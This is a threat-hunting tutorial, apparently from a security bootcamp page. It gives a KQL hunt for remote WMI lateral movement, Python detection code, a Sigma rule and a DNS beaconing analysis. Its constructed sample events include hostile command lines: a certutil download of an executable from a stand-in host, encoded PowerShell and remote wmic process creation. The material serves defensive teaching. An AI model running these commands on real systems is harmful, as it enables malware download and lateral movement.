Why It Matters
Detection technologies, however advanced, cannot catch every attack. Sophisticated adversaries blend in with normal user activity, abuse legitimate tools (living off the land), and operate slowly enough to stay under alert thresholds. IBM's Cost of a Data Breach Report has consistently put the average time to identify a breach at roughly 200 days; that dwell time, the gap between intrusion and detection, is when an attacker does the most damage.
Threat hunting changes the calculus. Rather than waiting for an alert, hunters assume compromise and search the environment for evidence of adversaries. In mature programs, human-led hunts are a primary source of new detection content: a hunt that finds something ships as a rule, and a hunt that finds nothing still documents a visibility gap.
The Hunting Cycle
1. Develop a Hypothesis
A good hypothesis is specific and testable, often derived from threat intelligence, recent incidents, or MITRE ATT&CK techniques relevant to the organization. Example: "An attacker is using WMI for lateral movement (T1047) in our finance subnet."
2. Investigate with Data
Pull relevant telemetry from EDR, identity systems, network sensors, and cloud logs. Apply analytics like frequency analysis, stack counting, outlier detection, and timeline reconstruction.
```kusto
// KQL hunt (Microsoft Defender advanced hunting) for remote WMI process creation (T1047):
// accounts that used wmic.exe or Invoke-WmiMethod against several hosts in the last 7 days.
DeviceProcessEvents
| where Timestamp > ago(7d)
// the tool: wmic.exe or the PowerShell cmdlet
| where ProcessCommandLine has_any ("wmic", "Invoke-WmiMethod")
// the remote marker: /node: targets another host, "process call create" spawns a process there
| where ProcessCommandLine has_any ("process call create", "/node:")
// stack by account: one admin patching one box is noise, one account touching many boxes is the hypothesis
| summarize Count=count(), Devices=dcount(DeviceName) by InitiatingProcessAccountName
| where Devices >= 3
| order by Count desc
```
3. Discover and Document
Whether the hypothesis is confirmed, refuted, or inconclusive, document what you learned, including queries, data sources, and gaps in visibility.
4. Engineer Detections
Convert successful hunts into automated detections (Sigma rules, EDR custom IOCs, SIEM correlations) so the SOC catches the same behavior automatically next time.
5. Hand-off and Improve
Confirmed compromises move to incident response. Telemetry gaps drive logging improvements. The cycle repeats with new hypotheses.
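The cycle above, worked through in Python on constructed telemetry (an added example, not code from the original page). It covers step 2 with stack counting and a Python mirror of the KQL remote-WMI hunt, and step 4 by turning the confirmed hunt into a Sigma rule. Field names follow the DeviceProcessEvents schema the KQL query uses; the events, hosts and accounts are constructed, and the Python version also treats PowerShell's `-ComputerName` switch as a remote marker, which the KQL query does not.

```python
"""Hunting cycle, steps 2 and 4, on constructed DeviceProcessEvents-style records."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

NOW = datetime(2024, 5, 20, 12, 0, tzinfo=timezone.utc)  # constructed "now"


def ev(days_ago, device, account, parent, cmdline):
    """Build one constructed process event in DeviceProcessEvents field names."""
    return {"Timestamp": NOW - timedelta(days=days_ago), "DeviceName": device,
            "InitiatingProcessAccountName": account,
            "InitiatingProcessFileName": parent, "ProcessCommandLine": cmdline}


# Constructed telemetry: svc-backup has no business reaching other workstations.
EVENTS = [
    ev(1, "FIN-WS01", "svc-backup", "cmd.exe",
       'wmic /node:FIN-WS02 process call create "cmd.exe /c whoami"'),
    ev(1, "FIN-WS03", "svc-backup", "cmd.exe",
       'wmic /node:FIN-WS04 process call create "powershell -enc SQBFAFgA"'),
    ev(2, "FIN-WS05", "svc-backup", "powershell.exe",
       "Invoke-WmiMethod -ComputerName FIN-WS06 -Class Win32_Process -Name Create"),
    ev(2, "FIN-WS05", "svc-backup", "powershell.exe",
       "Invoke-WmiMethod -ComputerName FIN-WS07 -Class Win32_Process -Name Create"),
    ev(3, "IT-ADM01", "jdoe-adm", "cmd.exe",
       'wmic /node:FIN-WS09 process call create "msiexec /i patch.msi"'),  # one host: admin work
    ev(1, "FIN-WS02", "alice", "cmd.exe", "wmic os get caption"),           # local query, no remote marker
    ev(12, "FIN-WS08", "svc-backup", "cmd.exe",
       'wmic /node:FIN-WS02 process call create "cmd.exe"'),                 # outside the 7-day window
    ev(1, "FIN-WS02", "alice", "EXCEL.EXE", "cmd.exe /c certutil -urlcache -f http://x/a.exe a.exe"),
    ev(1, "FIN-WS03", "bob", "explorer.exe", "cmd.exe /c dir"),
    ev(1, "FIN-WS04", "carol", "explorer.exe", "cmd.exe /c dir"),
]

TOOL_MARKERS = ("wmic", "invoke-wmimethod")
REMOTE_MARKERS = ("process call create", "/node:", "-computername")


def is_remote_wmi(cmdline):
    """Same predicate as the two KQL 'has_any' filters, case-insensitive substring matching."""
    c = cmdline.lower()
    return any(t in c for t in TOOL_MARKERS) and any(r in c for r in REMOTE_MARKERS)


def hunt_remote_wmi(events, now=NOW, lookback_days=7, min_devices=3):
    """Step 2: accounts issuing remote WMI from >= min_devices hosts inside the lookback window."""
    per_account = defaultdict(lambda: {"Count": 0, "Devices": set(), "Samples": []})
    for e in events:
        if e["Timestamp"] <= now - timedelta(days=lookback_days):
            continue
        if not is_remote_wmi(e["ProcessCommandLine"]):
            continue
        rec = per_account[e["InitiatingProcessAccountName"]]
        rec["Count"] += 1
        rec["Devices"].add(e["DeviceName"])
        if len(rec["Samples"]) < 5:            # keep a few command lines for triage
            rec["Samples"].append(e["ProcessCommandLine"])
    hits = {a: r for a, r in per_account.items() if len(r["Devices"]) >= min_devices}
    return dict(sorted(hits.items(), key=lambda kv: -kv[1]["Count"]))


def stack_count(events):
    """Step 2, stack counting: tally (parent image, first token of child command line);
    the rarest pairs go to the top of the review list."""
    stacks = Counter((e["InitiatingProcessFileName"].lower(),
                      e["ProcessCommandLine"].split()[0].lower()) for e in events)
    return sorted(stacks.items(), key=lambda kv: kv[1])


def sigma_rule_remote_wmi():
    """Step 4: the confirmed hunt as a Sigma rule (dict form; serialise with a YAML dumper to ship)."""
    return {
        "title": "Remote WMI Process Creation",
        "status": "experimental",
        "description": "wmic.exe or Invoke-WmiMethod creating a process on a remote host (T1047).",
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection_tool": {"CommandLine|contains": ["wmic", "Invoke-WmiMethod"]},
            "selection_remote": {"CommandLine|contains": ["process call create", "/node:", "-ComputerName"]},
            "condition": "selection_tool and selection_remote",
        },
        "tags": ["attack.execution", "attack.t1047"],
        "level": "medium",
    }


if __name__ == "__main__":
    for account, rec in hunt_remote_wmi(EVENTS).items():
        print(account, rec["Count"], sorted(rec["Devices"]), rec["Samples"][:2])
    print(stack_count(EVENTS)[:3])
    print(sigma_rule_remote_wmi()["detection"])
```

The Sigma rule deliberately drops the "three or more devices" threshold: that aggregation was useful to find the behaviour in a noisy week, but once the pattern is known, a single remote WMI process creation is worth an alert, and the SOC applies any allow-list for known admin hosts at the rule level.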
Hunting Methodologies
| Approach | Description | When to Use |
|---|---|---|
| Hypothesis-driven | Test specific TTP-based hypotheses | Routine, mature programs |
| Intelligence-driven | Hunt for IOCs from threat reports | After targeted threat advisories |
| Anomaly-based | Search for statistical outliers | Limited threat intel |
| Crown jewels | Focus on critical assets | Constrained resources |
| Hybrid | Combination of approaches | Most real programs |
The Pyramid of Pain
David Bianco's Pyramid of Pain ranks indicator types by how much it costs the adversary when you detect on them: hash values and IP addresses are trivial to change, domain names only slightly less so, network and host artifacts and tools take real effort to replace, and TTPs sit at the top because changing them means changing how the adversary operates. Hunts that pivot on TTPs and artifacts therefore keep paying off long after an IOC sweep has gone stale.
Common Hunting Hypotheses
- Suspicious LSASS access (credential dumping, T1003)
- Unsigned binaries running from temp directories
- Anomalous PowerShell with encoded commands
- Unusual parent-child process relationships
- DNS beaconing patterns
- Unexpected service account interactive logins
- New scheduled tasks created with elevated privileges
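One of the hypotheses above, DNS beaconing, worked through as an added example (not code from the original page). For every host/domain pair it computes the gaps between successive queries and their coefficient of variation (standard deviation divided by mean); a long series of near-identical gaps is the signature of an implant checking in on a timer, while human browsing produces irregular gaps. The query log, hosts and domains are constructed for the example.

```python
"""Periodicity analysis for the DNS beaconing hypothesis on a constructed query log."""
from collections import defaultdict
from statistics import mean, pstdev

BASE = 1_716_200_000  # constructed epoch base for the sample log


def constructed_dns_log():
    """Return (timestamp, host, domain) rows: one beacon, one browsing series, one short series."""
    rows = []
    # Implant check-in: every 60 s with deterministic +/-2 s jitter, 20 queries from FIN-WS01.
    t = BASE
    for i in range(20):
        rows.append((t, "FIN-WS01", "updates.example-cdn.net"))
        t += 60 + ((i * 7) % 5 - 2)
    # Ordinary browsing: irregular gaps to a popular domain from the same host.
    t = BASE
    for gap in (3, 120, 7, 900, 45, 2, 300, 15, 1800, 60, 4, 250):
        rows.append((t, "FIN-WS01", "www.example.com"))
        t += gap
    # Two lookups only: far too short to judge, must not be flagged.
    rows += [(BASE, "FIN-WS02", "cdn.example.org"), (BASE + 60, "FIN-WS02", "cdn.example.org")]
    return sorted(rows)


def interval_stats(log):
    """Per (host, domain): query count, mean gap in seconds, and coefficient of variation of the gaps."""
    by_pair = defaultdict(list)
    for ts, host, domain in log:
        by_pair[(host, domain)].append(ts)
    stats = {}
    for pair, times in by_pair.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if not gaps:
            continue
        m = mean(gaps)
        stats[pair] = {"queries": len(times), "mean_gap": m,
                       "cv": pstdev(gaps) / m if m else float("inf")}
    return stats


def find_beacons(log, min_queries=10, max_cv=0.1):
    """Beacon candidates: enough queries to be statistically meaningful, and low jitter.
    Tune min_queries to the lookback window and max_cv to how much jitter the local C2
    frameworks you care about add; 10% catches fixed-interval implants with small jitter."""
    return sorted(pair for pair, s in interval_stats(log).items()
                  if s["queries"] >= min_queries and s["cv"] <= max_cv)


if __name__ == "__main__":
    log = constructed_dns_log()
    for pair, s in sorted(interval_stats(log).items()):
        print(pair, s["queries"], round(s["mean_gap"], 1), round(s["cv"], 3))
    print("beacon candidates:", find_beacons(log))
```

In production the same statistics run per (source host, queried domain) over a day or a week of resolver logs, with an allow-list for domains that legitimately poll on a timer (update services, telemetry endpoints); those show up with a low CV too, which is why the hunt output is a triage list and not an alert.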
Building a Hunt Program
- Establish baselines of normal activity in your environment.
- Adopt MITRE ATT&CK as your common language and prioritization tool.
- Centralize telemetry in a SIEM or data lake with sufficient retention (90+ days).
- Schedule regular hunts with documented hypotheses and findings.
- Measure outputs: new detections shipped, mean dwell time reduction, gaps closed.
How We Teach Threat Hunting
In our Cybersecurity Bootcamp, you won't just learn about Threat Hunting in theory. You'll practice with real tools in hands-on labs, guided by industry professionals who use these concepts daily.
Covered in:
Module 8: Advanced Security Operations
360+ hours of expert-led training • CompTIA Security+ included